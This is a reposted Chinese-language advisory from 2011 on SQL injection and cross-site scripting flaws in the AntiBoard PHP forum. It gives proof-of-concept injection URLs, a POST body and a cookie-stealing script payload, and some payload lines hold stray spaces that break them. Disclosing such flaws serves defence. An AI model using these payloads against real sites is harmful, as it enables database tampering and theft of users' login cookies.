AntiBoard SQL注入及跨站脚本攻击(CSS/XSS)漏洞

2011-2-17 9:36:12 来源:网络转载 浏览:170
AntiBoard SQL注入及跨站脚本攻击(CSS/XSS)漏洞
影响版本:
AntiBoard 0.6-0.7.2

程序介绍:

AntiBoard是一款基于PHP的论坛程序。

漏洞分析:

AntiBoard对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞获得敏感信息或更改数据库。
antiboard.php脚本没有正确过滤用户输入,远程攻击者可以通过thread_id和parent_id字段注入SQL命令,可更改原有数据库逻辑导致修改数据库数据或获得敏感信息。
另外antiboard.php脚本也没有正确过滤HTML代码,因此攻击者可以构建恶意链接,诱使用户访问,可泄露目标用户基于COOKIE的验证信息。


漏洞利用:

/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=

/antiboard.php?range=all&mode=thr eaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--

/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20w hatever--&sort_order=ASC&mode=threaded

/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1

A remote user can also submit an HTTP POST request with the following parameters to inject SQL commands:

poster_name=1111&poster_email=1111&message_title=1111&message_bo dy=1111&submit=Submit%2bmessage&thread_id=3&mode=
 ALL select field from antiboard_emails----&reply=reply

http://[target]/antiboard.php?thread_id=1&mode=threaded&range=&feedback=<script>alert(docu ment.cookie);</script>

解决方案:
厂商补丁:
AntiBoard

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://freshmeat.net/projects/antiboard/

(0)
(0)